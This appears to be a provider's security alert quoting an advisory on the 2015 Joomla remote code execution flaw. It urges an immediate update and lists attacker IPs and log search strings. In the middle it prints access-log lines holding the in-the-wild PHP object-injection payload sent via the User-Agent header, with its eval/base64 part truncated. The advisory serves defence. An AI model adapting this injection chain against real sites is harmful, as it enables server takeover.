German (DE) 
Neue Joomla-Sicherheitslücke -> Dringendes Update 
security alert
Siehe Joomla Security:
"The Joomla security team have just released a new version of Joomla to patch a critical remote command execution vulnerability that affects all versions from 1.5 to 3.4.
This is a serious vulnerability that can be easily exploited and is already in the wild. If you are using Joomla, you have to update it right now.
Remote Code Execution
There is a security issue in Joomla! from Joomla 1.5 up until 3.4.5 related to remote code execution. This was followed up with some longer term fixes in Joomla 3.4.7
If you are using the old (unsupported) versions 1.5.x and 2.5.x, you have to apply the hotfixes from here (https://docs.joomla.org/Security_hotfixes_for_Joomla_EOL_versions).
Zero day Exploits in the Wild
What is very concerning is that this vulnerability is already being exploited in the wild and has been for the last 2 days. Repeat: This has been in the wild as a 0-day for 2 days before there was a patch available.
Looking back at our logs, we detected the first exploit targeting this vulnerability:
2015 Dec 12 16:49:07 clienyhidden.access.log
Src IP: 74.3.170.33 / CAN / Alberta
74.3.170.33 – – [12/Dec/2015:16:49:40 -0500] “GET /contact/ HTTP/1.1” 403 5322 “http://google.com/” “}__test|O:21:\x22JDatabaseDriverMysqli\x22:3: ..
{s:2:\x22fc\x22;O:17:\x22JSimplepieFactory\x22:0: .. {}s:21:\x22\x5C0\x5C0\x5C0disconnectHandlers\x22;a:1:{i:0;a:2:{i:0;O:9:\x22SimplePie\x22:5:..
{s:8:\x22sanitize\x22;O:20:\x22JDatabaseDriverMysql\x22:0:{}s:8:\x22feed_url\x22;s:60:..
and:
access.log:52.32.210.122 - - [01/Feb/2016:11:09:12 +0100] "GET / HTTP/1.1" 200 7348 "-" "}__test|O:21:\"JDatabaseDriverMysqli\":3:
{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:
{}s:8:\"feed_url\";s:3854:\"eval(base64_decode('JGNoZWNrID0gJF9TRVJWRV…..gkZnApOw=='));JFactory::getConfig();exit\";s:19:\
"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:
{}}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}\xf0\xfd\xfd\xfd"
We modified the payload so it can’t be misused, but the attackers are doing an object injection via the HTTP user agent that leads to a full remote command execution.
The wave of attacks is even bigger, with basically every site and honeypot we have being attacked. That means that probably every other Joomla site out there is being targeted as well.
Protect Your Site Now
If you are a Joomla user, check your logs right away. Look for requests from 146.0.72.83 or 74.3.170.33 or 194.28.174.106 as they were the first IP addresses to start the exploitation. I also recommend searching your logs for “JDatabaseDriverMysqli” or “O:” in the User Agent as it has been used in the exploits. If you find them, consider your Joomla site compromised and move to the remediation / incident response phase.
Note that clients behind our Website Firewall were already protected against this threat and are safe. Yes, our virtual patching for the HTTP User Agent kept ours users protected against this exploit.
If you use Joomla, update ASAP!
For those on the 3.x branch, update immediately to 3.4.6.
If you need help - call us: +49 89 130 133 60